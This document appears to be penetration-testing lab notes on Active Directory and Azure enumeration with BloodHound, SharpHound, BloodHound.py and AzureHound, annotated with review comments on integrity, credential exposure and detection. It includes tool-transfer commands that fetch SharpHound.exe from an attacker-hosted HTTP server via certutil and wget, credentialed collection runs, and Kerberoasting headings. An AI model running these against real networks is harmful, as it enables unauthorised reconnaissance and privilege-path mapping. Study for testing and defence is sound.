BloodHound
BloodHound
- install and run neo4j
- start bloodhound gui
SharpHound.ps1
- source: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
# Load the collector script from the current directory into this PowerShell session.
# NOTE(review): the source link above tracks the master branch, so the script is unpinned;
# record the commit and the file hash of the copy that is actually imported.
Import-Module .\SharpHound.ps1
# Run collection with method "All" against INLANEFREIGHT.LOCAL and name the output archive azdump.zip.
# NOTE(review): the archive presumably holds directory data (users, groups, sessions, ACLs);
# store and transfer it as sensitive engagement data.
Invoke-BloodHound -CollectionMethod All -Domain INLANEFREIGHT.LOCAL -ZipFileName azdump.zip
# Collection can take a while; wait for it to finish.
SharpHound
install
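# Fetch the pinned SharpHound v1.1.0 release archive into /opt/windows.
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip -O /opt/windows/SharpHound.zip
# Integrity check before unpacking: compare the archive digest with one obtained out of band.
# <EXPECTED_SHA256> is a placeholder; these notes do not record a digest.
#   echo "<EXPECTED_SHA256>  /opt/windows/SharpHound.zip" | sha256sum -c -
unzip /opt/windows/SharpHound.zip -d /opt/windows/sharpHound
rm /opt/windows/SharpHound.zip
# '&&' rather than '&': a single '&' runs mkdir in the background, so cd could run
# before the directory exists and the following cp would land in the wrong place.
mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/sharpHound/SharpHound.exe .
# Serves the working directory over unauthenticated HTTP on port 80; without --bind it
# listens on every interface. Keep only the file to be transferred in this directory and
# stop the server once the transfer is done.
python3 -m http.server 80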
REM Fetch SharpHound.exe over plain HTTP from 192.168.45.226 using certutil's URL-cache download.
REM Detection note: certutil.exe started with -urlcache and an http(s) URL is a widely used
REM process-creation detection for tool transfer (MITRE ATT&CK T1105).
certutil -urlcache -f http://192.168.45.226/SharpHound.exe SharpHound.exe
# Alternative fetch of the same file with wget.
# Plain HTTP gives no integrity or authenticity guarantee: compare the SHA-256 of the
# received file with the staged copy before it is run.
wget http://192.168.45.226/SharpHound.exe -O SharpHound.exe
BloodHound.py
BloodHound.py is a Python-based ingestor for BloodHound, built on Impacket.
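echo "==========> Windows:bloodHoundPy"
# Fetch the v1.0.1 source archive of BloodHound.py into /opt/windows.
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
# Integrity check before unpacking: compare the archive digest with one obtained out of band.
# <EXPECTED_SHA256> is a placeholder; these notes do not record a digest.
#   echo "<EXPECTED_SHA256>  /opt/windows/bloodHoundPy.zip" | sha256sum -c -
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
# Absolute paths: the archive was unpacked into /opt/windows/, so a relative mv only
# worked when the shell happened to be in that directory.
mv /opt/windows/BloodHound.py-1.0.1 /opt/windows/bloodHoundPy
rm /opt/windows/bloodHoundPy.zip
# Collect everything (-c all) for domain e-corp.com using name server 172.16.5.5.
# NOTE(review): -p puts the password on the command line, where it is visible in the
# process list and saved in shell history. bloodhound.py is documented to prompt when
# -p is omitted; confirm for v1.0.1.
/opt/windows/bloodHoundPy/bloodhound.py -u 'admin' -p 'xxxxxxxxxx' -ns '172.16.5.5' -d 'e-corp.com' -c all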
AzureHound
install
echo "==========> Windows:AzureHound"
# Fetch the pinned v1.2.4 linux-amd64 release archive into /opt/windows.
wget https://github.com/BloodHoundAD/AzureHound/releases/download/v1.2.4/azurehound-linux-amd64.zip -O /opt/windows/Azurehound.zip
# NOTE(review): nothing here verifies the archive before it is unpacked and run. Compare
# `sha256sum /opt/windows/Azurehound.zip` with <EXPECTED_SHA256> (placeholder; no digest
# is recorded in these notes) obtained out of band.
unzip /opt/windows/Azurehound.zip -d /opt/windows
rm /opt/windows/Azurehound.zip
# Run "list" against tenant e-corp.com and write the result to all.json.
# NOTE(review): -p puts the password on the command line, where it is visible in the
# process list and saved in shell history. all.json holds tenant directory data and
# should be kept where only the operator can read it.
/opt/windows/azurehound -u "admin@e-corp.com" -p "xxxxxxxxxx" list --tenant "e-corp.com" -o all.json
# Account, password and tenant used by the AzureHound commands below; single quotes keep
# the values literal.
# NOTE(review): USER is normally the login-name variable of the session, so assigning it
# here changes what every later command in this shell sees as the current user. A dedicated
# name would avoid that, but the commands below would need the same rename.
export USER='admin@e-corp.com'
# NOTE(review): export places the password in the environment of every child process
# started from this shell.
export PASS='xxxxxxxxxxxxxxxx'
export TENA='e-corp.com'
|-<
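# Confirm the three variables are populated. The password itself is not printed, so it
# does not end up in terminal scrollback or a session recording; only its presence is
# reported. Expansions are quoted so the values are shown exactly as stored.
printf '%s\n' "$USER"
if [ -n "${PASS:-}" ]; then
  echo 'PASS is set'
else
  echo 'PASS is empty'
fi
printf '%s\n' "$TENA"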
|-<
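# Show the global help and the help of the "list" subcommand.
/opt/windows/azurehound --help
/opt/windows/azurehound list --help
# One "list" call per object type, each written to its own JSON file.
# The expansions are quoted so that a password or account name containing spaces, '*',
# '?' or other shell metacharacters is passed as exactly one argument.
# NOTE(review): -p puts the password on the command line, where it is visible in the
# process list while each command runs. AzureHound appears to accept a configuration
# file via --config; confirm for v1.2.4 before relying on it.
# The JSON files hold tenant directory data and should be kept where only the operator
# can read them.
/opt/windows/azurehound -u "$USER" -p "$PASS" list tenants --tenant "$TENA" -o tenants.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list users --tenant "$TENA" -o users.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list groups --tenant "$TENA" -o groups.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list group-owners --tenant "$TENA" -o group-owners.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list group-members --tenant "$TENA" -o group-members.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list management-group-descendants --tenant "$TENA" -o management-group-descendants.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list management-group-owners --tenant "$TENA" -o management-group-owners.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list management-group-role-assignments --tenant "$TENA" -o management-group-role-assignments.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list management-group-user-access-admins --tenant "$TENA" -o management-group-user-access-admins.json -v 1
# This call carries no -v flag in the original notes; left as written.
/opt/windows/azurehound -u "$USER" -p "$PASS" list management-groups --tenant "$TENA" -o management-groups.json
/opt/windows/azurehound -u "$USER" -p "$PASS" list roles --tenant "$TENA" -o roles.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list role-assignments --tenant "$TENA" -o role-assignments.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list devices --tenant "$TENA" -o devices.json -v 1
/opt/windows/azurehound -u "$USER" -p "$PASS" list device-owners --tenant "$TENA" -o device-owners.json -v 1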
Analytics Queries
List all Kerberoastable Accounts
Find users that don’t require Kerberos pre-authentication (aka AS-REP Roasting)
Find servers a user can RDP into.
// Returns every path from a group whose objectid ends in '-513' over a CanRDP edge to a
// computer whose operatingsystem contains 'Server'.
// RID 513 is the well-known Domain Users group, so each returned path means every domain
// user holds RDP rights on that server; these are candidates for tightening the server's
// Remote Desktop Users membership.
match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' AND c.operatingsystem CONTAINS 'Server' return p
Find all sessions any user in a specific domain has
View all groups that contain the word ‘admin’
View all users that contain the word ‘admin’
View all computers